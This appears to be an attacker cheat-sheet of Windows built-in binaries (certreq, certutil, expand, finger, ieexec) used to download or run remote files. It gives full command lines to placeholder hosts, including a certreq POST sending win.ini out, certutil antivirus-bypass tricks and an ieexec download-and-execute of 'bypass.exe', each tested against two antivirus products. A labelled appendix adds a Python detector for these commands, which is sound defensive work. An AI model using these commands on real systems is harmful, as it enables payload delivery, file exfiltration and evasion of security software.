CertReq.exe
Paths:
C:\Windows\System32\certreq.exe
C:\Windows\SysWOW64\certreq.exe
system:
Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
File download command:
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
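Note: only POST-type download requests are supported. The contents of c:\windows\win.ini are sent as the POST request body and can be anything.
Antivirus test
360 | Huorong |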
---|---|
√ | √ |
Certutil.exe
paths:
C:\Windows\System32\certutil.exe
C:\Windows\SysWOW64\certutil.exe
system:
Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Download command:
certutil -urlcache -split -f http://xxxx.xxxx.xxxx a.txt
Bypass commands:
certutil -ur""lcache -split -f http://xxxxx.xxx.xxx a.txt
copy c:\windows\system32\certutil.exe a.exe
a.exe
a.exe -urlcache -split -f http://xxxx.xxx.xxx.xxx/a.exe a.exe
Antivirus test
360 | Huorong |
---|---|
√ | √ |
Expand.exe
paths:
C:\Windows\System32\Expand.exe
C:\Windows\SysWOW64\Expand.exe
system:
Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Download command:
expand \\webdav\folder\a.exe c:\ADS\a.exe
Drawback:
Only UNC-path downloads are supported; a Linux host needs a file share configured.
Antivirus test
360 | Huorong |
---|---|
√ | √ |
Finger.exe
Paths:
c:\windows\system32\finger.exe
c:\windows\syswow64\finger.exe
system:
Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
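Download command:
finger kali@192.168.180.190 | more +8 >1.txt
Note: the finger service must be running on the server, and the file to be downloaded must be written into the .plan file in the kali user's home directory. For details, see https://www.slashroot.in/finger-server-configuration-linux.
Antivirus test
360 | Huorong |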
---|---|
√ | √ |
Ieexec.exe
paths:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
system:
Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Download-and-execute command:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe http://x.x.x.x:8080/bypass.exe
Antivirus test
360 | Huorong |
---|---|
X | √ |
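
Detection side of the commands listed above, as an added example that is not part of the original page: it matches the remote-source argument of each of the five binaries and also catches the two certutil bypasses (inserted double quotes, renamed copy). It assumes process-creation events that carry Image, OriginalFileName and CommandLine fields (as Sysmon Event ID 1 does); the finding names, the `check` function and the sample events are constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

# Keyed by the PE OriginalFileName (lower-cased), so a renamed copy still matches.
# Each pattern is the remote-source argument shape of a command listed on this page.
RULES = {
    "certreq.exe": re.compile(r"[-/]post\b.*https?://", re.I),
    "certutil.exe": re.compile(r"[-/]urlcache\b.*https?:", re.I),
    "expand.exe": re.compile(r"\s\\\\[^\\\s]+\\"),   # UNC source path
    "finger.exe": re.compile(r"\s\S+@\S+"),          # user@host query
    "ieexec.exe": re.compile(r"\shttps?://", re.I),
}

def check(image, original_name, cmdline):
    """Return the set of findings for one process-creation event."""
    orig = original_name.lower()
    rule = RULES.get(orig)
    if rule is None:
        return set()
    findings = set()
    if PureWindowsPath(image).name.lower() != orig:
        findings.add("renamed-binary")
    # The program's argument parser drops double quotes, so -ur""lcache is
    # -urlcache by the time it is parsed; compare against the unquoted form.
    if rule.search(cmdline.replace('"', "")):
        findings.add("remote-fetch")
        if not rule.search(cmdline):
            findings.add("quote-obfuscation")
    return findings

SYS32 = "C:\\Windows\\System32\\"
# Constructed sample events: (Image, OriginalFileName, CommandLine)
EVENTS = [
    (SYS32 + "certutil.exe", "CertUtil.exe",
     'certutil -ur""lcache -split -f http://198.51.100.7/a.txt a.txt'),
    (r"C:\Users\test\a.exe", "CertUtil.exe",
     "a.exe -urlcache -split -f http://198.51.100.7/a.exe a.exe"),
    (SYS32 + "expand.exe", "expand.exe",
     r"expand \\webdav\folder\a.exe c:\ADS\a.exe"),
    (SYS32 + "finger.exe", "finger.exe", "finger kali@192.168.180.190"),
    (SYS32 + "certutil.exe", "CertUtil.exe",
     r"certutil -hashfile C:\temp\a.txt SHA256"),       # benign
    (SYS32 + "expand.exe", "expand.exe",
     r"expand C:\temp\a.cab C:\temp\out"),              # benign, local source
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(sorted(check(*ev)) or "-", "|", ev[2])
```

The pipe and redirect in the finger command are handled by cmd.exe, so the finger.exe event only shows the user@host argument.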